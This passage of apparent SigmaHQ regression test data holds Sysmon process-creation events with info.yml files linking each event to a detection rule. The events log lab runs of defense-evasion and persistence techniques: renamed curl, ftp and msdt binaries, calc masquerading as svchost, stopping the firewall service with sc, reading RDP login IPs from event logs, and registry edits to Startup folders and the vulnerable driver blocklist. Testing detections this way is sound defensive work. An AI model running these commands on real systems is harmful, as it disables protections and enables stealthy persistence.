"S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 20:29:25.272", "ProcessGuid": "5AB40FD1-3EA5-68F9-2F31-000000003B02", "ProcessId": 4564, "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-netsh.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Network Command Shell", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "netsh.exe", "CommandLine": "renamed-netsh.exe", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=28B5A3688253FD5822EE90BCAE2633F7,SHA256=7482890B1875BDCEC826F3385EAC7DCDC38F17358A13B1B8C790BDB895FF5054,IMPHASH=06F091DBEC9C3F0DD14808FFE59B95DE", "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", "ParentProcessId": 8252, "ParentImage": 
"C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/info.yml ================================================ id: e9861f82-77a9-4f8b-a418-0fbb6019588b description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 title: Potential Defense Evasion Via Binary Rename regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-22T20:28:22.116872Z" } }, "EventRecordID": 256810, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 20:28:22.113", "ProcessGuid": "5AB40FD1-3E66-68F9-2831-000000003B02", "ProcessId": 4832, "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-wscript.exe", "FileVersion": "5.812.10240.16384", "Description": "Microsoft ® Windows Based Script 
Host", "Product": "Microsoft ® Windows Script Host", "Company": "Microsoft Corporation", "OriginalFileName": "wscript.exe", "CommandLine": "renamed-wscript.exe", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=BA3DDE938146C1C1A19D6762E0BF5311,SHA256=61891E70C5629397DD107066F520D1663C5136AB4366E0CB015EC1D047DFFC61,IMPHASH=EB3973026D64331DD575543A07621F9D", "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", "ParentProcessId": 8252, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml ================================================ id: 8fc87eda-5a7b-4080-93c6-5bf6145330c8 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, 
"Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-22T20:30:29.328671Z" } }, "EventRecordID": 256840, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 20:30:29.319", "ProcessGuid": "5AB40FD1-3EE5-68F9-3A31-000000003B02", "ProcessId": 480, "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-curl.exe", "FileVersion": "8.13.0", "Description": "The curl executable", "Product": "The curl executable", "Company": "curl, https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "renamed-curl.exe", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", "ParentProcessId": 8252, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/info.yml ================================================ id: a8016fa4-d7e0-40de-85b0-ae04f270eec5 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 7530cd3d-7671-43e3-b209-976966f6ea48 title: Renamed CURL.EXE Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: 
regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-22T20:25:23.218638Z" } }, "EventRecordID": 256757, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 20:25:23.215", "ProcessGuid": "5AB40FD1-3DB3-68F9-0A31-000000003B02", "ProcessId": 5312, "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-ftp.exe", "FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)", "Description": "File Transfer Program", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "ftp.exe", "CommandLine": "renamed-ftp.exe", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=02EF5C4F3C041DE47811498C331B6F46,SHA256=B551CF05B43639364EFC71995E19DB620F5EFCE311110D0CF932354C3FE6ED7A,IMPHASH=7B22256667E90FDEA4DBB956FD02584C", "ParentProcessGuid": "5AB40FD1-8DEB-68F7-7E01-000000003B02", "ParentProcessId": 476, "ParentImage": 
"C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/info.yml ================================================ id: 280664b2-b588-40f6-8b65-280523049740 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 277a4393-446c-449a-b0ed-7fdc7795244c title: Renamed FTP.EXE Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-22T20:32:00.478719Z" } }, "EventRecordID": 256855, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 20:32:00.468", "ProcessGuid": "5AB40FD1-3F40-68F9-4431-000000003B02", "ProcessId": 2808, "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-msdt.exe", "FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)", "Description": "Diagnostics Troubleshooting Wizard", "Product": "Microsoft® 
Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "msdt.exe", "CommandLine": "renamed-msdt.exe", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=7C70F1DDC865BCFF963AD1CCFAA5E145,SHA256=377DD147174704790E2E981893E49FB72CE18133CF7E9E2EAA794ADF2F80D2DA,IMPHASH=9F0D1C67FCB6D4D5059556FF5E9A642B", "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", "ParentProcessId": 8252, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/info.yml ================================================ id: 0e26deb8-bbad-45fb-bb52-b5a2204ba626 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: bd1c6866-65fc-44b2-be51-5588fcff82b9 title: Renamed Msdt.EXE Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": 
"2025-10-22T20:33:27.276702Z" } }, "EventRecordID": 256875, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 20:33:27.274", "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", "ProcessId": 3424, "Image": "C:\\Windows\\System32\\sc.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Service Control Manager Configuration Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "sc.exe", "CommandLine": "sc stop mpssvc", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", "ParentProcessId": 8252, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": 
"2025-10-22T20:33:27.276702Z" } }, "EventRecordID": 256875, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 20:33:27.274", "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", "ProcessId": 3424, "Image": "C:\\Windows\\System32\\sc.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Service Control Manager Configuration Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "sc.exe", "CommandLine": "sc stop mpssvc", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", "ParentProcessId": 8252, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/info.yml ================================================ id: 81ea361b-6e7b-417c-8f70-abd288b10c35 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1 title: Stop Windows Service Via Sc.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: 
regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-03T07:42:38.210937Z" } }, "EventRecordID": 26765, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3116, "ThreadID": 1656 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-03 07:42:38.149", "ProcessGuid": "0197231E-E9EE-692F-B004-000000000900", "ProcessId": 9720, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "FileVersion": "10.0.26100.1 (WinBuild.160101.0800)", "Description": "Windows PowerShell", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell -Command \"Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$_.Id -eq 21} | ForEach-Object { $eventXml = [xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress = $eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -and $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login Time: ' + $loginTime) }}\"", "CurrentDirectory": "C:\\Users\\xodih\\", 
"User": "swachchhanda\\xodih", "LogonGuid": "0197231E-BBFB-692F-3C8C-050000000000", "LogonId": "0x58c3c", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=1736263E02468939F808C0528E8DBB7E,SHA256=1F9FFC2227F8DEA8B771D543C464CF8166C22A39420A5322B5892A640C4B34B6,IMPHASH=68A9FF9C8D0D4655E46E1A7A190A41D2", "ParentProcessGuid": "0197231E-E967-692F-A904-000000000900", "ParentProcessId": 9076, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/info.yml ================================================ id: a31979d4-d358-47c1-b698-875ec379a3c1 description: N/A date: 2025-12-03 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/e4a6b256-3e47-40fc-89d2-7a477edd6915.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2026-02-04T08:52:58.205267Z" } }, "EventRecordID": 715573, "Correlation": null, "Execution": { "#attributes": { 
"ProcessID": 776, "ThreadID": 4344 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2026-02-04 08:52:58.203", "ProcessGuid": "14207D89-08EA-6983-2A02-000000004402", "ProcessId": 5696, "Image": "C:\\Users\\SwachchhandaP\\Downloads\\taskhost.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Windows Calculator", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CALC.EXE", "CommandLine": "taskhost.exe", "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-057C-6983-A047-0C0000000000", "LogonId": "0xc47a0", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": "MD5=1FD4DD58C75D6F2EDCDB337EE686231E,SHA256=4208893C871D2499F184E3F0F2554DA89F451FA9E98D95FC9516C5AE8F2B3BBD,IMPHASH=8EEAA9499666119D13B3F44ECD77A729", "ParentProcessGuid": "14207D89-08EA-6983-2902-000000004402", "ParentProcessId": 1816, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd /c taskhost.exe", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/info.yml ================================================ id: 0efa6f32-c1df-4053-91ca-cafc05416e79 description: N/A date: 2026-02-04 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: e4a6b256-3e47-40fc-89d2-7a477edd6915 title: System File Execution Location Anomaly regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/e4a6b256-3e47-40fc-89d2-7a477edd6915.evtx ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2026-02-04T08:47:45.988926Z" } }, "EventRecordID": 715337, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 776, "ThreadID": 4344 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2026-02-04 08:47:45.987", "ProcessGuid": "14207D89-07B1-6983-EA01-000000004402", "ProcessId": 5592, "Image": "C:\\Users\\SwachchhandaP\\Downloads\\svchost.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Windows Calculator", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CALC.EXE", "CommandLine": ".\\svchost.exe", "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-057C-6983-A047-0C0000000000", "LogonId": "0xc47a0", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": "MD5=1FD4DD58C75D6F2EDCDB337EE686231E,SHA256=4208893C871D2499F184E3F0F2554DA89F451FA9E98D95FC9516C5AE8F2B3BBD,IMPHASH=8EEAA9499666119D13B3F44ECD77A729", "ParentProcessGuid": "14207D89-0781-6983-E201-000000004402", "ParentProcessId": 984, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/info.yml ================================================ id: 9cee7767-9219-40b3-b77e-dedf82957c94 description: N/A date: 2026-02-04 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: be58d2e2-06c8-4f58-b666-b99f6dc3b6cd title: Suspicious Process Masquerading As SvcHost.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/8f3ab69a-aa22-4943-aa58-e0a52fdf6818.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2026-01-05T06:59:26.079827Z" } }, "EventRecordID": 75087, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3636, "ThreadID": 4340 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2026-01-05 06:59:26.059", "ProcessGuid": "0197231E-614E-695B-DC0C-000000000C00", "ProcessId": 11680, "Image": "C:\\Windows\\System32\\reg.exe", "FileVersion": "10.0.26100.5074 (WinBuild.160101.0800)", "Description": "Registry Console Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "reg.exe", "CommandLine": 
"\"C:\\WINDOWS\\system32\\reg.exe\" add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v \"Common Startup\" /t REG_SZ /d C:\\Test\\calc.exe /f", "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-70FA-694F-AED1-150000000000", "LogonId": "0x15d1ae", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0", "ParentProcessGuid": "0197231E-7211-694F-D001-000000000C00", "ParentProcessId": 9524, "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentCommandLine": "powershell -ep bypass", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/info.yml ================================================ id: 60dc10cf-d9d5-4e64-897f-90b9074def8f description: N/A date: 2026-01-05 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 8f3ab69a-aa22-4943-aa58-e0a52fdf6818 title: User Shell Folders Registry Modification via CommandLine regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/8f3ab69a-aa22-4943-aa58-e0a52fdf6818.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/22154f0e-5132-4a54-aa78-cc62f6def531.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", 
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-23T02:16:46.810517Z" } }, "EventRecordID": 90849, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3320, "ThreadID": 4216 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-23 02:16:46.792", "ProcessGuid": "0197231E-FB8E-6949-2610-000000000D00", "ProcessId": 25368, "Image": "C:\\Windows\\System32\\reg.exe", "FileVersion": "10.0.26100.5074 (WinBuild.160101.0800)", "Description": "Registry Console Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "reg.exe", "CommandLine": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config\" /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 00000000 /f", "CurrentDirectory": "C:\\Windows\\System32\\", "User": 